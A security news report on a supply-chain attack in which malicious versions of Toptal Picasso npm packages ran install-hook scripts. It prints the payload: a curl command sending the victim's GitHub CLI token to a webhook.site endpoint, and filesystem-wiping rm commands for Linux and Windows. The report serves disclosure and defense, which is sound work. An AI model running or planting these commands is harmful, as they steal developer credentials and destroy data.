Socket’s Threat Research Team has discovered that at least 10 malicious packages were published to npm from within Toptal’s GitHub organization, putting thousands of developers and systems at risk. The affected repositories are part of Toptal’s Picasso design system, a widely used front-end framework for enterprise applications.
The attack weaponized several scoped packages, including:
- @toptal/picasso-tailwind
- @toptal/picasso-charts
- @toptal/picasso-shared
- @toptal/picasso-provider
- @toptal/picasso-select
- @toptal/picasso-quote
- @toptal/picasso-forms
- @xene/core
- @toptal/picasso-utils
- @toptal/picasso-typograph
These packages were downloaded approximately 5,000 times before they were detected and removed from npm. All of them carried the same payload in their package.json files, placed in the preinstall and postinstall lifecycle scripts. npm runs those hooks automatically during npm install, so simply installing or updating an affected package, directly or as a transitive dependency, was enough to trigger it.
The attack follows a two-stage strategy designed for maximum impact:
Stage 1: Token Theft
curl -d "$(gh auth token)" https://webhook[.]site/fb5b4647-aff8-418c-99e7-ec830cc2024b

The preinstall script runs gh auth token, which prints the OAuth token stored by the GitHub CLI, and POSTs it to a webhook.site endpoint controlled by the attacker. The command only yields a token on machines where the GitHub CLI is installed and logged in; elsewhere the request carries an empty body or an error message. A captured token can be replayed against the GitHub API with whatever scopes the victim granted the CLI, which is typically enough to read private repositories and push commits as the victim.
Stage 2: System Destruction
sudo rm -rf --no-preserve-root /

Immediately after stealing the token, the script attempts to wipe the victim's filesystem. GNU rm refuses to operate on / unless --no-preserve-root is given, so the flag removes the last built-in safeguard. The sudo prefix is the weak point: it prompts for a password unless the account has passwordless sudo or a still-valid cached credential, and an npm install is rarely run where anyone is there to type one, so this stage often fails on developer workstations while succeeding on CI runners with passwordless sudo. For Windows it falls back to:

rm /s /q

This is written in the style of rmdir /s /q, but cmd.exe has no rm command, and in PowerShell rm is an alias of Remove-Item that would read /s and /q as paths rather than switches, so on a default Windows shell this line is more likely to error out than to delete anything. The intent is clearly cross-platform destruction, even if the execution is uneven.
“This dual-platform approach ensures the malicious payload can cause damage regardless of the victim’s operating system,” the report warns.
The exact compromise vector is still under investigation. Socket suggests several possible scenarios:
- Credential Theft – Through phishing, leaks, or credential stuffing
- Insider Threat – A rogue developer with direct GitHub access
- Phishing Variant – Linked to earlier npm phishing attacks targeting projects like prettier
- Separate Vectors – Independent compromises of both GitHub and npm credentials
Toptal acted swiftly upon discovery:
“Toptal responded quickly once the compromise was identified and deprecated the malicious package versions and reverted to their last stable versions, preventing further distribution of the malicious code.”
Their prompt mitigation likely prevented wider impact across the JavaScript ecosystem.
Update (August 6th): Toptal has released an official statement on this security incident.